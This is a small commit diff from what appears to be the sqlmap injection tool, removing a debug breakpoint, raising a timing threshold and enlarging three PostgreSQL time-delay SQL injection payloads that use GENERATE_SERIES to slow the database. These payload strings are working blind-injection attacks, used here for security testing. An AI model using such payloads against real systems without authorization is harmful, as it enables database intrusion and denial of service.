minor update

stamparm · stamparm · commit 3d87489de5af · 2010-12-07T08:05:03.000Z
diff --git a/lib/controller/checks.py b/lib/controller/checks.py
@@ -46,7 +46,6 @@
 from lib.core.session import setString
 from lib.core.session import setRegexp
 from lib.core.settings import TIME_MIN_DELTA
-from lib.core.settings import TIME_N_RESPONSE
 from lib.request.connect import Connect as Request
 from plugins.dbms.firebird.syntax import Syntax as Firebird
 from plugins.dbms.postgresql.syntax import Syntax as PostgreSQL
@@ -360,14 +359,11 @@ def checkSqlInjection(place, parameter, value):
 
                                 injectable = True
                         elif check == "[DELAYED]":
-                            if duration >= max(TIME_MIN_DELTA, TIME_N_RESPONSE * kb.responseTime):
+                            if duration >= max(TIME_MIN_DELTA, kb.responseTime):
                                 infoMsg = "%s parameter '%s' is '%s' injectable " % (place, parameter, title)
                                 logger.info(infoMsg)
 
                                 injectable = True
-                            else:
-                                import pdb
-                                pdb.set_trace()
                         # Restore old value of socket timeout
                         socket.setdefaulttimeout(popValue())
 
diff --git a/lib/core/settings.py b/lib/core/settings.py
@@ -48,10 +48,8 @@
 
 PAYLOAD_DELIMITER  = "\x00"
 
-# settings used for delayed time payloads
-TIME_MIN_DELTA     = 1 # minimum difference of loading time in seconds
-TIME_N_RESPONSE    = 3 # minimum multiplicant of response time
-
+# minimum difference of loading time in seconds for delayed time payloads
+TIME_MIN_DELTA     = 2
 
 # System variables
 IS_WIN             = subprocess.mswindows
diff --git a/xml/payloads.xml b/xml/payloads.xml
@@ -1267,7 +1267,7 @@ Formats:
         <clause>0</clause>
         <where>1</where>
         <request>
-            <payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000));</payload>
+            <payload>; SELECT [RANDNUM] WHERE EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000));</payload>
             <comment>--</comment>
         </request>
         <response>
@@ -1503,7 +1503,7 @@ Formats:
         <clause>1,2,3</clause>
         <where>1</where>
         <request>
-            <payload>AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000))</payload>
+            <payload>AND EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
         </request>
         <response>
             <time>[DELAYED]</time>
@@ -1658,7 +1658,7 @@ Formats:
         <clause>1,2,3</clause>
         <where>2</where>
         <request>
-            <payload>OR EXISTS(SELECT * FROM GENERATE_SERIES(1, 3000000))</payload>
+            <payload>OR EXISTS(SELECT * FROM GENERATE_SERIES(1, 10000000))</payload>
         </request>
         <response>
             <time>[DELAYED]</time>
